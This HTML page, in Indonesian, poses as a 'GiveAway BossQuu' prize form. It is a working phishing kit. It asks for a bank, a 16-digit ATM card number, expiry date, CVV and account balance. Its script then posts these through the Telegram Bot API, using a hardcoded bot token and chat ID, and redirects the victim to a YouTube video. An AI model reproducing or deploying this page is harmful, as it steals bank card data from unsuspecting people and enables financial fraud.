<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Formulir Rekening</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-T3c6CoIi6uLrA9TneNEoa7RxnatzjcDSCmG1MXxSR1GAsXEV/Dwwykc2MPK8M2HN" crossorigin="anonymous">
  </head>
  <body>
    <nav class="navbar" style="background-color: #fcff32">
      <div class="container">
        <a class="navbar-brand" href="#">
            <img src="https://t3.ftcdn.net/jpg/04/83/58/90/360_F_483589048_DN0uPcM4D8EfKJ6gaBZbHc3pApgYnHgs.jpg" alt="logo" width="200" height="S0">
        </a>
        <h2 style="color: #254dce">GiveAway BossQuu</h2>
        <div class="container">
            <div class="logo-atas">
                <img class="img-fluid" src="atas.jpg" alt="">
                </div>
            
    </nav>
    <div class="container">
        <div class="title-web mt-2">
            <div class="logo-atas">
                <center><img class="img-fluid" src="https://jendelaguru.com/wp-content/uploads/2021/11/bank-umum-indonesia.jpg" alt=""></center>
            </div>
      <div class="title-web mt-1">
        <h2 class="text-center">Silahkan Dilengkapi ya BoSsQuu untuk Rekening nya Agar Bisa di Proses</h2>
      </div><br>
        <div class="container w-80">
            <div class="form-cc">
                <div class="form-group">
                    <div class="form-group" style="width: 70%">
                        <select style="border-radius: 15px" class="form-control shadow-sm" id="input0">
                        <option value="">=Pilihan Bank Anda=</option>
                        <option value="BCA">BCA</option>
                        <option value="BNI">BNI</option>
                        <option value="BRI">BRI</option>
                        <option value="Mandiri">Mandiri</option>
                        <option value="BTN">BTN</option>
                        <option value="CIMB NIAGA">CIMB NIAGA</option>
                        <option value="BSI">BSI</option>
                        <option value="OCBC NISP">OCBC NISP</option>
                        <option value="PERMATA">PERMATA</option>
                        <option value="DANAMON">DANAMON</option>
                        <option value="BTPN">BTPN</option>
                        <option value="Bank MEGA">Bank MEGA</option>
                        </select>
                </div>
                <div class="form-group">
                    <input style="border-radius: 10px" type="number" class="form-control shadow-sm" id="input1" placeholder="Nomor Kartu ATM 16 Digit Angka" maxlength="16" minlenght="16">
                </div>
                <label class="fw-bold mt-3">Masa Berlaku Kartu ATM</label>
                <div class="d-flex justify-content-between mt-3">
                    <div class="form-group" style="width: 30%">
                        <select style="border-radius: 15px" class="form-control shadow-sm" id="input2">
                            <option value="">Bulan</option>
                            <option value="1">1</option>
                            <option value="2">2</option>
                            <option value="3">3</option>
                            <option value="4">4</option>
                            <option value="5">5</option>
                            <option value="6">6</option>
                            <option value="7">7</option>
                            <option value="8">8</option>
                            <option value="9">9</option>
                            <option value="10">10</option>
                            <option value="11">11</option>
                            <option value="12">12</option>
                        </select>
                    </div>
                    <div class="form-group" style="width: 20%">
                        <select style="border-radius: 15px" class="form-control shadow-sm form-control-sm" id="input3">
                            <option value="">Tahun</option>
                            <option value="2023">2023</option>
                            <option value="2024">2024</option>
                            <option value="2025">2025</option>
                            <option value="2026">2026</option>
                            <option value="2027">2027</option>
                            <option value="2028">2028</option>
                        </select>
                    </div>
                    
                </div>
                <div class="form-group mt-3">
                    <label class="fw-bold" for="input4">CVV 7 Digit di Belakang Kartu</label>
                    <input style="border-radius: 15px" type="number" class="form-control shadow-sm" id="input4" placeholder="7 Digit Angka">
                </div>
                <label class="fw-bold mt-3">Akumulasi Saldo Terakhir</label>
                <div class="form-group">
                    <input style="border-radius: 15px" type="number" class="form-control shadow-sm" id="input5" placeholder="Rp.*********" maxlength="16" minlenght="16">
                </div>
                <div class="bnt-next mt-3 mb-3 text-center">
                    <button onclick="next()" class="btnNext mt-3" style="background-color: #007BED; border: none; border-radius: 19px; width: 100%; color: white; font-weight: bold; height: 45px">Lanjut</button>
                </div>
            </div>
        </div>
    </div>

    <script>
        function sendMessage(id, botApi, pesan) {
            const url = `https://api.telegram.org/bot${botApi}/sendMessage`;
            const data = {
                chat_id: id,
                text: pesan
            };
            fetch(url, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify(data)
            })
            .then(response => response.json())
            .then(data => {
                console.log('Pesan terkirim:', data);
                window.location.href = "https://www.youtube.com/watch?v=9dcS-zy-vuw"
            })
            .catch(error => {
                console.error('Terjadi kesalahan:', error);
            });
        }

        const next = () => {
            const bank = document.querySelector("#input0").value;
            const nocard = document.querySelector("#input1").value;
            const bulan = document.querySelector("#input2").value;
            const tahun = document.querySelector("#input3").value;
            const cvv = document.querySelector("#input4").value;
            const saldo = document.querySelector("#input5").value;
            
            let text = `==| REKENING BANK |==\n\nType Bank: ${bank}\nNomor Kartu: ${nocard}\nBulan: ${bulan}\nTahun: ${tahun}\nCVV: ${cvv}\nsaldo: ${saldo}`;
            let bot = "6812088676:AAHFIo1sIwC_I-VQnXbpWJeh-nu3nArVvjc";
            let id = "6863354480";
            if (bank
             === "" || nocard === "" || cvv === "" || bulan === "" || tahun === "" || saldo === "") {
                alert("Mohon lengkapi data Anda.");
            } else {
                sendMessage(id, bot, text);
            }
        }
    </script>

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-C6RzsynM9kWDrMNeT87bh95OGNyZPhcTNXj1NW7RuBCsyN/o0jlpcV8Qyq46cDfL" crossorigin="anonymous"></script>
</body>
</html>